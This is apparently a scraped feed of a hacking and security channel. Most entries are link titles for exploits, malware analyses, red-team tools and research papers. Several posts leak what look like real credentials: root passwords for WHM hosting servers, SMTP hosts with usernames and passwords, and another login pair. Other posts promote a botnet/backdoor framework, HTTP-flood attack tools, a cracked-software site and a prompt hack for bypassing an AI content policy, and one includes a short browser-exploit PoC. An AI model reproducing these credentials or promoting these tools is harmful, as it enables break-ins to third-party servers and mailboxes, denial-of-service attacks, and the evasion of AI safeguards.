2023-01-06 16:16:09
#Threat_Research1. Prototype Pollution in Python Pre-Auth RCE in Liferay Portal CE (CVE-2019-16891)
2023-01-06 16:16:08
#Analytics#InfographicsSystematization of attacks on the perimeter of L2/L3 network equipment. Ver. 3.0.
2023-01-06 15:55:17
2023-01-06 15:21:53
Account Takeover Using Password Resetby Unknown
2023-01-06 13:46:01 pack of osint
2023-01-06 12:37:15
2023-01-06 07:37:36
2023-01-06 07:37:16
2023-01-05 17:29:00
2023-01-05 17:23:46
🔹 Usefull Websites 🔹1. Digital Library - Archive.org2. Online Courses - w3schools.com3. Screenshot Taker (Permanent) - Archive.is4. Learn Languages - Duolingo.com5. Screenshot Taker (HD) - Screenshot.guru6. Bypass Login (Websites) - Bugmenot.com7. Graphic Softwares - Vectr.com8. Cracked Softwares - CrackingPatching.com9. File Sharing (2GB) - wetransfer.com10. Autodraw (A.I) -
2023-01-05 14:08:22
#Research#cryptography"Factoring integers with sublinear resources on a superconducting quantum processor", Dec. 2022.
2023-01-05 14:08:21
#Tech_book"Security Strategies in Linux Platforms and Applications. Third Edition", 2022.
2023-01-05 14:08:20
#WhitepaperAPI Security Best Practices Guide: Comprehensive list of security best practices to secure your APIs throughout their lifecycle + API Security Checklist]-> APIKit: Discovery, Scan and Audit APIs Toolkit:
2023-01-05 14:08:19
#Research#Threat_Research"Open-CyKG: An Open Cyber Threat Intelligence Knowledge Graph", 2021.]->
2023-01-05 14:08:18
#Research"Experience Report on the Challenges and Opportunities in Securing Smartphones Against Zero-Click Attacks", 2022.
2023-01-05 14:07:55
#DFIRNew Windows 11 Pro (22H2) Evidence of Execution Artifact
2023-01-05 14:07:54
#Threat_Research#Red_Team_Tactics"Autonomous Penetration Testing using Reinforcement Learning"]-> Network Attack Simulator:
2023-01-05 14:07:53
#Research"EarSpy: Spying Caller Speech and Identity through Tiny Vibrations of Smartphone Ear Speakers", 2022.
2023-01-05 14:07:52
#Offensive_security1. Google Hacking Database (GHDB) NTP Fingerprinting Powershell scripts for post exploitation
2023-01-05 14:07:51
#Sec_code_reviewOWASP Mobile Application Security Testing Guide (MASTG)
2023-01-05 14:07:50
#exploit#reversing1. Vulnerability in Synology NAS Reverse Engineering and Exploiting an IoT TotoLink N100RE bug ESI Injection PoCs
2023-01-05 14:07:49
#Malware_analysis1. The Mac Malware of 2022 New version of Raspberry Robin
2023-01-05 14:07:48
#exploit1. Buffer overflow exploit for Stephen Bradshaw's Vulnserver CVE-2022-20951:Cisco BroadWorks CommPilot Application Software Unauthenticated SSRF CVE-2022-20958:Cisco BroadWorks CommPilot Application Software Authenticated RCE
2023-01-05 11:19:00
2023-01-05 10:55:14
2023-01-05 06:25:29
2023-01-05 06:25:28
2023-01-04 16:06:49
🔥🔥🔥Indirect syscalls PoCs:💥HellsHall(combination of HellsGate and indirect syscalls) - Another Way To Fetch Clean Syscalls🔖Github repo💥C_SYSCALLS is a single stub direct and indirect syscalling with runtime SSN resolving for windows.💥Hiding Your Syscalls - bypassing detections that I wrote myself. To the best of my knowledge EDR vendors aren’t really alerting on direct syscalls yet.🔖Source code💥FreshyCalls tries to make the use of syscalls comfortable and simple, without generating too much boilerplate and in modern C++! Doesn't it bother you to have to define every syscall stub or function within a module? Or having to depend on the Windows version for the syscalls? Well, forget about all that. FreshyCalls makes use of some features implemented from C++11 such as the variadic templates along with some custom mini-shellcode to avoid this.💥syscalls-asm💥Charon's Ferry(adapted from HellsGate)- An indirect syscaller
2023-01-04 16:06:48
🌐Top 10 web hacking techniques of 2022
2023-01-04 13:10:23
2023-01-04 12:12:16
2023-01-04 04:55:10
​​PyBotNetA #Python framework for building remote control, #botnet , #trojan or #backdoor with Telegram or other control panels
2023-01-04 02:36:24
2023-01-04 01:24:20
2023-01-03 16:37:26
2023-01-03 12:11:12
2023-01-03 06:49:31
Welcoming Our Forum »» https://system32.inkASK: Anything Related To Tech With Create your Own forumLearn: About Programming,cybersecurity,bugHunting And Many MorePost: Share your Knowledge,Rats,Databases And Videos related to TechSo SignUp Now And Grow Our Community Thank You;
2023-01-03 06:03:07
Fresh Onionshttp://freshonifyfe4rmuh6qwpsexfhdrww7wnt5qmkoertwxmcuvm4woo4ad.onion/
2023-01-03 06:03:06
Hacking tools pack & backdoors generator Interface lockscreen, Metasploit and More Android/IOS Hacking Socks4/5 or http proxies to make a multithreading Http-flood/Https-flood (cc) attack
2023-01-03 03:10:00
2023-01-02 18:27:41
🔥🔥🔥Survey of security mitigations and architectures, December 2022"This blogpost summarizes and compares some of the exciting approaches in our journey to memory safety. I hope this could become a reference to interested readers and colleagues.Along this blogpost I’ll consider five security properties: spatial safety, temporal safety, type safety, definite initialization and concurrency safety."
2023-01-02 18:27:39
Thank you very much for reading me ❤️Here is an article about reverse firmware in English:
2023-01-02 18:24:06
#Infographics#Malware_analysisRansomware & Data Extortion Landscape in 2022
2023-01-02 18:24:05
#Threat_ResearchCVE-2022-27510, CVE-2022-27518 - Measuring Citrix ADC & Gateway version adoption on the Internet
2023-01-02 18:24:04
#tools#Blue_Team_Techniques1. HTML Smuggling Detection - HTML Smuggling Detection Log4Shell-Scanner-Exploit - Bash script to identify the Log4j CVE-2021-44228 vulnerability remotely
2023-01-02 15:57:49
2023-01-02 14:30:25
2023-01-02 03:28:20
2023-01-01 16:02:37
2023-01-01 15:05:12
Welcoming Our Forum »» https://system32.inkASK: Anything Related To Tech With Create your Own forumLearn: About Programming,cybersecurity,bugHunting And Many MorePost: Share your Knowledge,Rats,Databases And Videos related to TechSo SignUp Now And Grow Our Community Thank You;
2023-01-01 14:48:22
2022-12-31 16:40:29
2022-12-30 18:15:45
EarSpy – A New Attack on Android Devices Use Motion Sensors to Steal Sensitive Data
2022-12-30 18:12:58
Мой диплом по безопасности динамической маршрутизации, который я защитил на отлично в этом году (заканчивал я значит колледж)Пользуйтесь на здоровье
2022-12-30 16:39:49
🧰RedTeam-Tools is github repository contains a collection of tools and resources that can be useful for red teaming activities.⚙️Reconnaissance⚙️Resource Development⚙️Initial Access⚙️Execution⚙️Persistence⚙️Privilege Escalation⚙️Defense Evasion⚙️Credential Access⚙️Discovery⚙️Lateral Movement⚙️Collection⚙️C&C⚙️Exfiltration⚙️Impact
2022-12-30 16:26:31
#hardeningWindows 10 Hardening (v.0.9.0) settings and configurations
2022-12-30 16:26:30
#reversing1. Reverse Engineering Rustlang Binaries - A Series Huawei's Security Hypervisor
2022-12-30 16:26:29
#Malware_analysis1. GuLoader Malware Uses Advanced Anti-Analysis Techniques to Evade Detection CatB Ransomware
2022-12-30 16:26:28
#Threat_ResearchSupply-Chain Security:Evaluation of Threats and Mitigations
2022-12-30 16:26:27
#Research#Sec_code_review"Do Users Write More Insecure Code with AI Assistants?", 2022.
2022-12-30 16:26:26
#Cloud_Security1. Parsing and manipulating JSON in Powershell Passwordless Persistence and Privilege Escalation in Azure
2022-12-30 15:18:22
must watch once video by @Deadlymalwarexp💻@Deadlymalwarexp💻
2022-12-30 14:42:22
2022-12-30 14:17:12
Россияне в третьем квартале текущего года вывели в другие страны рекордные 1,47 трлн рублей. Это почти в три раза больше, чем в первом и втором кварталах, и в 26 раз больше, чем в третьем квартале 2021 года.Translation: ru-enIn the third quarter of this year, the Russians withdrew a record 1.47 trillion rubles to other countries. This is almost three times more than in the first and second quarters, and 26 times more than in the third quarter of 2021.
2022-12-29 15:30:52
2022-12-29 11:37:02
Free WHM 🔟✔️root;KdiKQWsb; | Domains: 14tegkocom;#))CW(TQntc5; | Domains: 39root;T7w7f8sS; | Domains: 56root;G@briel8728; | Domains: 13meghahos;6C5@[NuY9kTu9t; | Domains: 14root;TrigonHost@12345A!; | Domains: 28inovaho1;Ajf@56290270; | Domains: 10starhost;LJ8fm[06tB1x*C; | Domains: 8bdsp;J4p)Z=k(={c&; | Domains: 29root;oSDJ2pYiR2x1Pqcn; | Domains: 5root;1q2w3e4r5t!Q"W£E$R%T; | Domains: 7inovaho1;Ajf@56290270; | Domains: 10root;HnGpQrwHBs42v2; | Domains: 6root;tF1xO0cZ5pU0jA4w; | Domains: 3pointmakinacom;H^YN23zbeXX?; | Domains: 8inaciomecena;@Megatec2604; | Domains: 8root;x(G+D%k#bn0dEA)0Pt; | Domains: 18📣
2022-12-29 11:37:01
#𝑆𝑀𝑇𝑃𝑆 🟢🔥HOST : : 587USER : postmaster@account.billada.comPASS : f792a046ee0b4ddd9312a7d2bbb8cef7-8845d1b1-dd279ceeHOST : premium157.web-hosting.comPORT : 587USER : noreply@bridgepro.caPASSW : qComPass@Romi7664SENDER : unknown@unknown.comHOST : mail.msofficeskill.comPORT : 587USER : info@msofficeskill.comPASSW : Prateek@1974SENDER : info@msofficeskill.comHOST : smtp.hostinger.comPORT : 587USER : support@ironpatches.netPASSW : Undisputed$1SENDER : support@ironpatches.netHOST : smtp.office365.comPORT : 587USER : mbl@myanmar-brewery.comPASS : P@ssw0rd2022@)@@HOST : srvc204.trwww.comPORT : 587USER : : Send0034!SENDER : : smtp.hostinger.comPORT : 587USER : support@ironpatches.netPASSW : Undisputed$1SENDER :
2022-12-28 16:20:03
#Research"A Survey of the Recent Trends in Deep Learning Based Malware Detection", 2022.
2022-12-28 16:20:02
#reversingL’art de l’évasion: How Shlayer hides its configuration inside Apple proprietary DMG files
2022-12-28 16:20:01
#Malware_analysis1. BlueNoroff introduces new methods bypassing MoTW GuLoader Dissection Reveals New Anti-Analysis Techniques and Code Injection Redundancy
2022-12-28 16:20:00
#tools#Offensive_securitySteganography Toolkit
2022-12-28 16:19:59
#tools#reversing1. OFRAK (Open Firmware Reverse Analysis Konsole) - binary analysis and modification platform A free comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM & 64-bit ARM architectures
2022-12-28 16:19:58
#Offensive_securityModifying Embedded Filesystems in ARM Linux zImages
2022-12-28 16:19:57
#Red_Team_Tactics1. Divide And Bypass: A new Simple Way to Bypass AMSI Pass-the-Challenge: Defeating Windows Defender Credential Guard
2022-12-28 16:19:56
#exploitKITCTFCTF 2022 V8 Heap Sandbox Escape]-> PoC:
2022-12-28 16:19:55
#tools#Blue_Team_Techniques 1. Potential Cloud Account Takeover Kernel-mode WinDbg extension for Protected Process investigation
2022-12-28 14:33:15
2022-12-28 14:00:42
Certificate Ripper v2 released - tool to extract server certificates December 28, 2022 at 06:24AM by Hakky54via reddit
2022-12-28 14:00:41
Spice up your persistence: loading PHP extensions from memory December 28, 2022 at 03:25AM by gid0rahvia reddit
2022-12-27 17:08:21
​​DSTIKE WiFI Deauther MiNiDeauther MiNi is still an ESP8266 development board,It comes installed with the latest ESP8266 Deauther software. With this software, you can perform different attacks to test WiFi networks. Please note that the ESP8266 does only support 2.4GHz.You can also use it to develop your own software. It is simple to use, just like any other ESP8266 development board.Function:▫️ Deauther Attack: Disconnect 2.4G WiFi▫️ Deauther Beacon: Create fake networks▫️ Deauther Probe:Confuse wifi trackers▫️ Packet Monitor:Display wifi trafficDeauther or Jammer: What's the difference?Buy online: 🛒 #dstike #esp8266
2022-12-27 14:57:04
2022-12-26 14:29:19
🔥🔥🔥Cinema time!Agenda:💾Video decoding subsystem overview💾AppleAVD internals💾AppleAVD attack surface💾Fuzzing approach and code analysis💾Results💾Previously disclosed vulnerabilities and exploitation💾Discussion💾Q&A
2022-12-26 14:28:43
🔥🔥🔥KITCTFCTF 2022 V8 Heap SBX(V8 exploitation challenge)In this writeup, I’ll go over the intended solution in detail which leads to a V8 (heap) sandbox escape without using the JIT technique that is very popular currently.
2022-12-26 14:28:39
💥Introduction to the Windows Filtering PlatformThe Windows Filtering Platform (WFP) provides flexible ways to control network filtering. It exposes user-mode and kernel-mode APIs, that interact with several layers of the networking stack. Some configuration and control is available directly from user-mode, without requiring any kernel-mode code (although it does require administrator-level access). WFP replaces older network filtering technologies, such as Transport Driver Interface (TDI) filters some types of NDIS filters.
2022-12-26 14:28:33
🔥🔥🔥AD manager Plus full RCE PoC At that time, Log4j was already widespread on the internet. Manage Engine had already patched the Ad Manager Plus to prevent it from being affected by the Log4j vulnerability. They had mentioned that Log4j was not affected by Ad Manager Plus. However, we determined that the Ad Manager Plus was running on our target and managed to exploit the Log4j vulnerability.When we initially reported this vulnerability to Synack, we only managed to get a DNS callback and our report was marked as LDAP injection. However, we attempted to gain full RCE on the host but were not successful. Later, we discovered that Ad Manager Plus was running on another target, so we tried to get full RCE on that target. We realized that there was a firewall and an anti-virus running on the machine, so most of our payloads wouldn't work. After spending a considerable amount of time , we eventually managed to bypass the firewall and anti-virus, and achieve full RCE.
2022-12-26 14:28:26
|The Apocalypse of the Heap - Shizo edit.|💥Painless intro to the Linux userland heapThe heap is hard to maintain, especially in this implementation due to being threaded. Hopefully this article helps you understand the process of making a chunk free from its allocation and which structures play in the game of freeing chunks.💥Understanding glibc malloc💾How heap memory is obtained from kernel?💾How efficiently memory is managed?💾Is it managed by kernel or by library or by application itself?💾Can heap memory be exploited?💥ptmalloc fanzine episodes(collection of resources related to glibc heap meta-data corruptions):💾episode 01: munmap madness💾episode 02: fastbin fever💾episode 03: scraps of notes on ptmalloc metadata corruptions💾episode 04: once upon a realloc()💾episode 05: thread local caching in glibc malloc💥Heap exploitation for Dummies.This short book is written for people who want to understand the internals of 'heap memory', particularly the implementation of glibc's 'malloc' and 'free' procedures, and also for security researchers who want to get started in the field of heap exploitation.🔖github repo💥Educational Heap Exploitation(how2heap) is for learning various heap exploitation techniques. We use Ubuntu's Libc releases as the gold-standard. Each technique is verified to work on corresponding Ubuntu releases.💥GlibC Malloc for Exploiters presentation💥Linux Heap Exploitation Intro Series:💾printf might be leaking!💾Used and Abused – Use After Free 💾The magicians cape – 1 Byte Overflow 💾Riding free on the heap – Double free attacks! 💾Set you free() – part 1 💾Set you free() – part 2 💥How to exploit a double free vulnerability in 2021(Exploiting an ARM-only race condition)You will learn how to exploit a double free vulnerability or exploit a UAF vulnerability.💥Linux kernel heap feng shui in 2022In this article we discuss changes in the Linux kernel slab allocator implementation and exploitation challenges associated with kernel heap-related vulnerabilities. We focus on the SLUB (unqueued slab allocator) implementation in this article since it is the most common allocator enabled by default on most Linux distributions and Android devices.💥Overview of GLIBC heap exploitation techniquesOverview of current GLIBC heap exploitation techniques up to GLIBC 2.34, including their ideas and introduced mitigations along the way.💥Perfect Spray: A Journey From Finding a New Type of Logical Flaw at Linux Kernel To Developing a New Heap Exploitation TechniqueIn this talk, we will present Pspray, a new memory exploitation technique for the Linux kernel, dramatically improving the exploitation reliability. In particular, we designed a heap exploitation technique effective for most memory vulnerabilities, including heap OOB, UAF, and double-free. The key idea behind this new attack is in developing timing side-channels in Linux's SLUB allocator. Then using this timing side-channel, we carefully redesigned the traditional exploitation technique to precisely predict the runtime behavior of SLUB, allowing Pspray to avoid unexpected exploitation failure. We used Pspray's exploitation technique for 10 real-world Linux kernel vulnerabilities, which significantly improved the attack success probability from 56.1% to 97.92%.
2022-12-26 14:28:22
⬇️Ниже приведен короткий список материалов, который мне помог в изучении эксплуатации кучи.⬇️⬇️Below is a short list of materials that helped me in studying the heap exploitation ⬇️
2022-12-26 14:13:25
2022-12-26 05:05:46
​​dnscrypt-proxyA flexible DNS proxy, with support for modern encrypted DNS protocols such as DNSCrypt v2, DNS-over-HTTPS, Anonymized DNSCrypt and ODoH (Oblivious DoH).▫️ dnscrypt-proxy documentation ← Start here▫️ DNSCrypt project home page▫️ Discussions▫️ DNS-over-HTTPS and DNSCrypt resolvers▫️ Server and client implementations▫️ DNS stamps▫️ FAQ #privacy
2022-12-26 05:05:45
Overview of Glibc Heap Exploitation Techniques (currently up to v2.34) December 25, 2022 at 10:17AM by himeko98via reddit
2022-12-25 15:35:37
Hello everyone in this auspicious day we are going to launch our Forum powered by @H4ckerinthehouse where you can connect, share and communicate with each others. Here are some features of this forum:You can ask questions, create polls, answer to any question. You can refer to anyone using your refferal code. You can make a public discussion group as well as a private discussion group! Also you can send a private message to an individual and you can ask anything. A lot of upcoming features and surprises are coming in upcoming days.So what you guys are looking for? Go and register on the Hackerinthehouse Forum. Here is the link of the forum to register:
2022-12-25 14:04:03
2022-12-25 01:44:59
Happy Tulsi Pujan ❤️
2022-12-24 16:39:20
#reversingReverse Engineering Tiktok's VM Obfuscation
2022-12-24 16:39:19
#Malware_analysis1. Zerobot Malware IcedID Botnet Distributors Abuse Google PPC to Distribute Malware
2022-12-24 16:39:18
#Blue_Team_Techniques1. Linux kernel module generator for Hidden firewall that follows the rules in the external YAML file Guide to Use Sigma EVTX Checker Fast go-based scanner for Linux, Windows, macOS that applies Sigma rules and outputs the matches as JSON
2022-12-24 16:39:17
#exploit1. CVE-2020-9854:"Unauthd" - three logic bugs ftw CVE-2022-3875, CVE-2022-3876, CVE-2022-3877:Vulnerabilities in Passwordstate
2022-12-24 16:39:16
#tools#Offensive_security1. Rps_Http ClientInfo IOC search PowerShell script for recent Exchange issue to check for signs of exploitation Vultriever - Vulnerability scoring with Nmap with the built-in Vulners snap-in
2022-12-24 16:39:15
#Threat_Research1. Custom-Branded Ransomware: The Vice Society Group and the Threat of Outsourced Development New Ransomware Strains Emerging From Leaked Conti’s Source Code
2022-12-24 16:38:17
🔥🔥🔥PoC of wfshbr64.sys LPE(Windows Kernel Mode Anti-Cheat Driver, CVE-2022-42046)wfshbr64.sys and wfshbr32.sys specially crafted payload allows arbitrary user to perform bitwise operation with arbitrary EPROCESS offset and flags value to purposely elevate the game process to CodeGen Full protection by manipulating EPROCESS.Protection and EPROCESS.SignatureLevel flags (security hole as a feature).⚠️The driver is signed by Microsoft hardware compatibility publisher that is submitted via Microsoft Hardware Program.
2022-12-24 16:38:16
🔥🔥🔥Blindside is a technique for evading the monitoring of EDR and XDR platforms using hardware breakpoints to inject commands and perform unexpected, unwanted, or malicious operations. It involves creating a breakpoint handler, and setting a hardware breakpoint that will force the debugged process to load only ntdll to memory. This will result in a clean and unhooked ntdll which then could be copied to our process and unhook the original ntdll.🔖Technical blog post:Blindside: A New Technique for EDR Evasion with Hardware Breakpoints
2022-12-24 16:38:15
💥Reverse Engineering Tiktok's VM Obfuscation (Part 1)This article does not delve into the specifics of how these strings are utilized or how TikTok interprets the rest of the bytecode through its custom virtual machine and various opcodes. If that is something you are interested in, keep an eye out for the second part of this series.🔖Full strings dump
2022-12-24 16:12:27
2022-12-24 10:30:35
2022-12-24 10:11:58
2022-12-24 09:59:36
»»»» ««««UserName: tac-userPassword: ~D4p5o8s
2022-12-23 14:56:02
Hello, my rabbits who like to go to tea parties 🐰☕️While I am writing about bitcoin nodes search and analysis, I decided to make a collection of rootkit malware on linux🐧Reverse💊Not really about linux, but still a very cool guide to reverse ; Article about reverse-engineering the Ebpfkit rootkit ;Article about dovecat and hy4 malware analysis for Linux ;A collection of resources for reverse-engineering Linux ; Article about virus analysis aromatization on linux ;Article about malware analysis for Linux ;Article about rootkit and its detection ;Resources🗝A site with material on viruses and rootkits on linux, including their writing ; A site with resources on reversal ; A resource site for people who want to write viruses for linux ;A site with excellent material and documents about linux malware ;Examples of malware 🦠A github thread with cool virus repositories ;Linux X86_64 ELF virus ;A simple linux virus. It can get root rights and destroy your system ;Linux ransomware ;Repository of the source code of various Linux malware ;Combination of shell and rootkit ;Collection of Linux rootkits ; A simple Linux kernel rootkit ;MateriaLs / Collections📖A collection of linux virus materials ;A collection of materiałs on rootkits and attacks on linux ;Article about evading malware analysis by reverse engineering ;Malware analysis methodology in Linux environment ;An article for understanding Linux malware ;Not a bad article about writing rootkits on linux ;Malware Scanners 🧲LMD malware scanner for Linux ;Linux rootkit scanner ;A github thread with collections of Linux rootkit scanners ;Also a good rootkit scanner ;As you can see, although it is widely accepted that "writing viruses on linux is difficult, or even impossible practice", it is far from it, and that you have linux is not yet a silver bullet against viruses On linux, viruses (especially rootkits) are written and very successfullySo take care and protect your systemThank you for reading ❤️And Alice, don't forget to read the sign on the back of the bottle you want to drink, in case it says "poison"🧪🎀#malware #virus #revers #ransomware #attacks #linux #exploit #rootkit
2022-12-23 14:52:41
🔥🔥🔥The GOAD’s writeups series end with this part. 💥GOAD - part 12 - TrustsThis post will be on escalation with domain trust (from child to parent domain) and on Forest to Forest trust lateral move.
2022-12-23 14:33:14
2022-12-22 16:05:24
​​Hacking & Cybersecurity class materialsWe are delighted to announce a first on Lawfare: A live online class on hacking and cybersecurity.
2022-12-22 16:05:23
​​USB NinjaUSB Ninja is an information security and penetration testing tool that looks and functions just like a regular USB cable (both power and data) until a wireless remote control triggers it to deliver your choice of attack payload to the host machine. In essence, USB Ninja is the next step in the evolution of BadUSB, embedding the attack in the USB cable itself.Emulating keyboard and mouse actions, payloads can be completely customized and can be highly targeted. Undetectable by firewalls, AV software (depending on payload of course) or visual inspection, the USB Ninja is an ideal tool for penetration testers, police and government.Wireless trigger device for the USB Ninja. Can trigger two different payloads via toggle buttons. Accepts RP-SMA antennas if you want greater distances for remote payload triggering. Documentation: online:🛒 Cable🛒 Bluetooth Remote #badusb #cable
2022-12-22 16:02:36
​​Golden NuggetsBurp Suite Extension to easily create Wordlists based off URI, URI Parameters and Single Words (Minus the Domain)
2022-12-22 16:02:35
​​MSI ShenanigansThis repository contains Proof of Concept code and harmless weaponised packages representing various weaponisation strategies that Threat Actors abuse in Windows Installer MSI format. Shenanigans. Part 1 – Offensive Capabilities Overview:
2022-12-22 16:02:34
​​plutionPrototype pollution scanner using headless chrome
2022-12-22 16:01:37
​​SquarePhishSquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.
2022-12-22 16:01:36
​​Copilot, for your terminalA CLI tool that generates shell scripts from a human readable description.
2022-12-22 14:38:34
​​chatgpt_chinese_prompt_hackUse prompt hack to bypass OpenAI's content policy restrictions by golfzert
2022-12-22 14:09:01
2022-12-22 05:51:16
#exploit1. CVE-2022-48870:maccms admin+ xss attacks CVE-2022-39253:Docker host file read
2022-12-22 05:51:15
#WebApp_SecurityWeb Attack Cheat Sheet
2022-12-22 05:51:14
#Offensive_securityDumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk, plus functions and strings obfuscation, duplicate lsass handle from existed processes
2022-12-21 17:24:04
2022-12-21 15:28:02
#exploit1. CVE-2022-47518, CVE-2022-47519, CVE-2022-47520, CVE-2022-47521:Remote DoS in Linux kernel WILC1000 wireless driver CVE-2022-2602:io_uring kernel exploit Directory Traversal Vulnerability in Huawei HG255s Products
2022-12-21 15:28:01
#Threat_Research#Cloud_Security1. Linux Kernel: Exploiting a Netfilter Use-after-Free in kmalloc-cg Elastic IP Hijacking - A New Attack Vector in AWS
2022-12-21 15:27:46
#Blue_Team_TechniquesIncident Response Methodologies 2022 EN/ES/FR/RU Versions
2022-12-21 15:27:45
#AnalyticsTop 10 most exploited vulnerabilities in 20221. CVE-2022-30190: MS Office "Follina"2. CVE-2021-44228: Apache Log4Shell3. CVE-2022-22965: Spring4Shell4. CVE-2022-1388: F5 BIG-IP5. CVE-2022-0609: Google Chrome zero-day CVE-2017-11882: Old but not forgotten - MS Office bug7. CVE-2022-41082, CVE-2022-41040: ProxyNotShell8. CVE-2022-27925, CVE-2022-41352: Zimbra Collaboration Suite bugs9. CVE-2022-26134: Atlassian Confluence RCE flaw 10. CVE-2022-30525: Zyxel RCE vulnerability
2022-12-21 14:46:53
2022-12-21 13:45:30
💥OWASSRF: CrowdStrike Identifies New Exploit Method for Exchange Bypassing ProxyNotShell MitigationsCrowdStrike recently discovered a new exploit method (called OWASSRF) consisting of CVE-2022-41080 and CVE-2022-41082 to achieve remote code execution (RCE) through Outlook Web Access (OWA). The new exploit method bypasses URL rewrite mitigations for the Autodiscover endpoint provided by Microsoft in response to ProxyNotShell.After initial access via this new exploit method, the threat actor leveraged legitimate Plink and AnyDesk executables to maintain access, and performed anti-forensics techniques on the Microsoft Exchange server in an attempt to hide their activity.
2022-12-21 13:45:29
💥Home Grown Red Team: Let’s Make Some Malware In C: Part 3This post is going to be all about the dll!
2022-12-21 13:45:25
🔥CVE-2022-2602 Exploit using inode locking technique.📕DirtyCred: Escalating Privilege in Linux Kernel🔖Blog posts: DirtyCred Remastered: how to turn an UAF into Privilege EscalationCVE-2022-2602: DirtyCred File Exploitation applied on an io_uring UAF
2022-12-21 13:45:15
|CVE-2022-2602 Kernel Exploit|🔥The vulnerability is an UAF that impacts the registered file descriptor functionality in the io_uring subsystem. It's possible to register a file in the io_uring context, free it from the Unix Garbage Collector(GC) and re-use it with the requested io_uring operation (for example, a writev operation). To exploit the bug, it was a matter of replace the freed file structure with a read-only file (e.g. /etc/passwd), in order to write into it, and achieve a good timing with a small race window.
2022-12-21 13:45:14
🔥Deconstructing and Exploiting CVE-2020-6418 (exploit here)This vulnerability lies in the V8 engine of Google Chrome, namely its optimizing compiler Turbofan. Specifically, the vulnerable version is in Google Chrome’s V8 prior to 80.0.3987.122. In this article, Daniel Toh Jing En will give a step-by-step analysis of the vulnerability, from the root cause to exploitation.
2022-12-21 13:45:12
|FORCEDENTRY, ты тут?|🕵️‍♂️Думаю, что многие не забыли про сделавший много шума год назад data-only 0-click RCE сплойт FORCEDENTRY(CVE-2021-30860, integer overflow в JBIG2 реализации для xpdf в Apple (JBIG2Stream::readTextRegionSeg(), посредством программирования JBIG2 weird machine в парсере), что относится к CoreGraphics по сути) через iMessage от NSO Group. То есть прилетает тебе PDF файл, который якобы ".gif" и за счет того, что IMTranscoderAgent анализировал как раз такого рода самозванцев за пределами BlastDoor песочницы, израильтяне могли достичь SBX. В действительности эксплуатация была намного сложнее и можно почитать подробнее: на канале, тут и тут.Причем исследователи из Google Project Zero не смогли установить точный след после IMTranscoderAgent SBX и как предположение выдвинули несколько сценариев эксплуатации:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEПроблема для безопасников и по сей день стоит в том, что в публичном доступе до сих пор нет сэмплов(отсюда можем сделать вывод, что стандартными методами детектить не выйдет). В этом посте Мэтта помимо разбора атаки идет речь и о детектировании без испльзования регулярок или проверок имени процесса, в конечном итоге был представлен инструмент(ELEGANTBOUNCER) для анализа файлов non-fileless(data-only) атаки, причем не основываясь на сэмплах. 🔖Более подробно можно почитать в статье Мэтта.🕵️‍♂️I think that many have not forgotten about the FORCEDENTRY exploit that made a lot of noise a year ago (CVE-2021-30860, integer overflow in the JBIG2 implementation for xpdf in Apple (JBIG2Stream::readTextRegionSeg(), by programming the JBIG2 weird machine in the parser), which refers to CoreGraphics in fact) via iMessage from NSO Group. That is, a PDF file arrives to you, which is allegedly ".gif" and due to the fact that IMTranscoderAgent analyzed just such impostors outside the BlastDoor sandbox, the Israelis could achieve SBX. In fact, the operation was much more complicated and you can read more: a on the channel, here and here.Moreover, researchers from Google Project Zero were unable to establish an exact trace after IMTranscoderAgent SBX and, as an assumption, put forward several operating scenarios:1️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ iOS kernel LPE2️⃣iMessage RCE ➡️ IMTranscoderAgent SBX ➡️ some_service ➡️ iOS kernel LPEThe problem for security guards to this day is that there are still no samples in the public domain (from here we can conclude that it will not be possible to detect using standard methods). In this post by Matt, in addition to analyzing the attack, we are talking about detecting without using regular expressions or checking the process name, eventually a tool for analyzing non-fileless(data-only) attack files was introduced, and not based on samples(ELEGANTBOUNCER). 🔖You can read more in Matt's article.#NSO #PegasusSpyware #FORCEDENTRY #iOS #iMessage #forensics #security #expoitation #sbx #xpdf #weirdMachine #JBIG2
2022-12-21 13:44:10
💥In-Memory Execution in macOS: the Old and the NewAs part of our work, it’s often interesting to try to find possible avenues of attack that bypass detections on EDR products. On macOS, EDR products specifically collect telemetry from fork and exec syscalls. macOS has alternative ways of executing code, which side-step these system calls by executing code directly in-memory.In this writeup, we touch on all 3 aforementioned APIs and then create a PoC loader which uses NSCreateObjectFileImageFromFile and CFBundleCreate to load a bundle from disk and execute it.
2022-12-20 14:41:31
2022-12-20 07:07:12
2022-12-20 06:47:15
2022-12-20 06:32:26
2022-12-20 05:02:57
🔥Linux Kernel: Exploiting a Netfilter UAF in kmalloc-cgWe describe a method to exploit a UAF in the Linux kernel when objects are allocated in a specific slab cache, namely the kmalloc-cg series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
2022-12-20 05:02:33
🔥🔥🔥Type confusion vulnerability(CVE-2022-42823) exists in the Apple Safari JSC Inspector(Root Cause Analysis + PoC).A Type confusion vulnerability exists in the Apple Safari JSC Inspector. This issue causes Memory Corruption due to Type confusion. A victim must open an arbitrary generated HTML file to trigger this vulnerability.PoC:<script> let object = {}; Object.prototype.__defineSetter__('type', function() { object.x = {}; object[0] = object.x; });</script>🛡Fixed in: macOS 13, tvOS 16.1, iOS 16.1 & iPadOS 16, Safari 16.1, watchOS 9.1.
2022-12-20 04:54:25
​​ZoneAlarmEoPExploit for Arbitrary File Move vulnerability in ZoneAlarm AV
2022-12-20 03:11:03
#Red_Team_Tactics1. Blindside: A New Technique for EDR Evasion with Hardware Breakpoints Raw sockets hacking]-> Secure shell using port Knocking technique with AES256-GCM:
2022-12-20 03:11:02
#tools#Offensive_security1. Shennina - Automating Host Exploitation with AI AMSI-bypass obfuscation + ETW-block obfuscation + powershell command obfuscation
2022-12-20 03:11:01
#Infographics"VT Intelligence Cheat Sheet", 2022.
2022-12-20 03:10:59
#Analytics#Malware_analysis1. Ransomware Business Models: Future Pivots and Trends SentinelSneak: Malicious PyPI module poses as security software development kit
2022-12-19 17:58:10
Heartbleed vulnerability exploited🩸▪️ #github #soft #Heartbleed
2022-12-19 17:58:09
CrimeFlare - This tool can help you to see the real IP behind CloudFlare protected websites.
2022-12-19 17:56:52
